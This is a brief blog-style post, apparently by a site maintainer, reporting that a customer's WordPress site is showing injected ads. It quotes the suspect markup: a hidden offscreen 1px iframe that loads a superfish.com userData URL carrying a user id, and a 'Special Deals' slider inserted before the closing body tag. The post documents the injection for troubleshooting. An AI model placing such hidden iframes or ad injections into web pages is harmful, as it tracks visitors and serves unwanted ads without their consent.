A customers WordPress site is displaying ads again.

 

wordpress_attack_jan_15_2015

Don’t have all the information, but there were links to www.superfish.com. This site turns out be some visual recognition software.

Here is some of the code in the page that I believe is linked to the attack.

 

<iframe src=”http://www.superfish.com/ws/userData.jsp?dlsource=wjfudcm&amp;userid=NTBCNTBC&amp;ver=2015.1.15.13.57″ style=”position: absolute; top: -100px; left: -100px; z-index: -10; border: medium none; visibility: hidden; width: 1px; height: 1px;”></iframe>

The code for the box was just above the ending body tag. Below is some of the code that was found.

<div id=”similarproducts_side_slider class=”__similarproducts similarproducts_side_slider false style=”right: 0px;>
<div class=”side_slider_header>
<div class=”header_tongue>
<div class=”vertical_text>Deals</div><div class=”offers_count></div><div class=”unit_title>Special Deals</div>
<div class=”x _close_unit></div>
<div class=”collapse _collapse></div>
<div class=”expand _expand></div>

Will try to post more info if I can.